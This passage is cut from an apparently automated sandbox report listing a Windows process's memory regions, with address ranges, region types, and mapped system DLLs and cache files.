= "" Region: id = 403 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 404 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 405 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 406 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 407 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 408 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 409 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 410 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 411 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 412 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 413 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 414 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 415 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 416 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 417 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 418 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 419 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 420 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 421 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 422 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 423 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 424 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 425 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 426 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 427 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 428 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 429 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 430 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 431 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 432 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 433 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 434 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 435 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 436 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 437 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 438 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 439 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 440 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 441 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 442 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 443 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 444 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 445 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 446 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 447 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 448 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 449 start_va = 0x2510000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 450 start_va = 0x735d0000 end_va = 0x736c4fff monitored = 0 entry_point = 0x735e0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 451 start_va = 0x76a50000 end_va = 0x76adefff monitored = 0 entry_point = 0x76a53fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 452 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 453 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 454 start_va = 0x73d70000 end_va = 0x73f0dfff monitored = 0 entry_point = 0x73d9e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 455 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 456 start_va = 0x4f0000 end_va = 0x4f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 457 start_va = 0x739b0000 end_va = 0x739fbfff monitored = 0 entry_point = 0x739b2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 458 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 459 start_va = 0x76880000 end_va = 0x76902fff monitored = 0 entry_point = 0x768823d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 460 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 461 start_va = 0x73f50000 end_va = 0x749cffff monitored = 0 entry_point = 0x73f56b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 462 start_va = 0x754e0000 end_va = 0x754e4fff monitored = 0 entry_point = 0x754e1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 463 start_va = 0x73f10000 end_va = 0x73f4bfff monitored = 0 entry_point = 0x73f13089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 464 start_va = 0x750c0000 end_va = 0x752bafff monitored = 0 entry_point = 0x750c22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 465 start_va = 0x510000 end_va = 0x510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 466 start_va = 0x520000 end_va = 0x521fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 467 start_va = 0x74e30000 end_va = 0x74f65fff monitored = 0 entry_point = 0x74e31b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 468 start_va = 0x76b70000 end_va = 0x76c64fff monitored = 0 entry_point = 0x76b71865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 469 start_va = 0x1e60000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 470 start_va = 0x1ea0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 471 start_va = 0x1ee0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 472 start_va = 0x1f20000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 473 start_va = 0x2610000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 474 start_va = 0x2710000 end_va = 0x280ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 475 start_va = 0x2810000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 476 start_va = 0x2910000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 477 start_va = 0x2950000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 478 start_va = 0x2a50000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 479 start_va = 0x2a90000 end_va = 0x2b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 480 start_va = 0x2b90000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 481 start_va = 0x2bd0000 end_va = 0x2ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 482 start_va = 0x2cd0000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 483 start_va = 0x2d10000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 484 start_va = 0x2e10000 end_va = 0x2e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 485 start_va = 0x2e50000 end_va = 0x2f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 486 start_va = 0x2f50000 end_va = 0x2f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 487 start_va = 0x2f90000 end_va = 0x308ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 488 start_va = 0x3090000 end_va = 0x30cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 489 start_va = 0x30d0000 end_va = 0x31cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 490 start_va = 0x31d0000 end_va = 0x320ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 491 start_va = 0x3210000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 492 start_va = 0x3310000 end_va = 0x334ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 493 start_va = 0x3350000 end_va = 0x344ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 494 start_va = 0x7ef86000 end_va = 0x7ef88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 495 start_va = 0x7ef89000 end_va = 0x7ef8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 496 start_va = 0x7ef8c000 end_va = 0x7ef8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 497 start_va = 0x7ef8f000 end_va = 0x7ef91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 498 start_va = 0x7ef92000 end_va = 0x7ef94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 499 start_va = 0x7ef95000 end_va = 0x7ef97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 500 start_va = 0x7ef98000 end_va = 0x7ef9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 501 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 502 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 503 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 504 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 505 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 506 start_va = 0x3450000 end_va = 0x348ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 507 start_va = 0x3490000 end_va = 0x358ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 508 start_va = 0x7ef83000 end_va = 0x7ef85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 509 start_va = 0x3590000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 510 start_va = 0x3590000 end_va = 0x35a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 511 start_va = 0x35b0000 end_va = 0x35bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035b0000" filename = "" Region: id = 512 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 513 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 514 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 515 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 516 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 517 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 518 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 519 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 520 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 521 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 522 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 523 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 524 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 525 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 526 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 527 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 528 start_va = 0x3590000 end_va = 0x359dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003590000" filename = "" Region: id = 529 start_va = 0x765a0000 end_va = 0x7673cfff monitored = 0 entry_point = 0x765a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 530 start_va = 0x75070000 end_va = 0x75096fff monitored = 0 entry_point = 0x750758b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 531 start_va = 0x750a0000 end_va = 0x750b1fff monitored = 0 entry_point = 0x750a1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 532 start_va = 0x3590000 end_va = 0x359cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 533 start_va = 0x35a0000 end_va = 0x35a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 534 start_va = 0x35b0000 end_va = 0x35c6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db") Region: id = 535 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035d0000" filename = "" Region: id = 536 start_va = 0x35e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 537 start_va = 0x35e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 538 start_va = 0x35e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 539 start_va = 0x73d60000 end_va = 0x73d6afff monitored = 0 entry_point = 0x73d61992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 540 start_va = 0x35a0000 end_va = 0x35a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 541 start_va = 0x74b00000 end_va = 0x74b07fff monitored = 0 entry_point = 0x74b01356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 542 start_va = 0x74ad0000 end_va = 0x74af8fff monitored = 0 entry_point = 0x74ad6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 543 start_va = 0x74ab0000 end_va = 0x74ac3fff monitored = 0 entry_point = 0x74ab15c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 544 start_va = 0x35e0000 end_va = 0x35e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 545 start_va = 0x35f0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 546 start_va = 0x3620000 end_va = 0x3623fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 547 start_va = 0x3630000 end_va = 0x3695fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 548 start_va = 0x74a90000 end_va = 0x74aa6fff monitored = 0 entry_point = 0x74a91549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 549 start_va = 0x36a0000 end_va = 0x36dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 550 start_va = 0x36e0000 end_va = 0x37dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 551 start_va = 0x7ef80000 end_va = 0x7ef82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 552 start_va = 0x74a80000 end_va = 0x74a87fff monitored = 0 entry_point = 0x74a83c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 553 start_va = 0x37e0000 end_va = 0x37edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 554 start_va = 0x722a0000 end_va = 0x722aafff monitored = 0 entry_point = 0x722a1200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 555 start_va = 0x37f0000 end_va = 0x37f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037f0000" filename = "" Region: id = 556 start_va = 0x3800000 end_va = 0x383ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 557 start_va = 0x3840000 end_va = 0x393ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 558 start_va = 0x7ef7d000 end_va = 0x7ef7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 559 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 560 start_va = 0x3c0000 end_va = 0x3d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 561 start_va = 0x3e0000 end_va = 0x3edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 562 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 563 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 564 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 565 start_va = 0x3c0000 end_va = 0x3cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 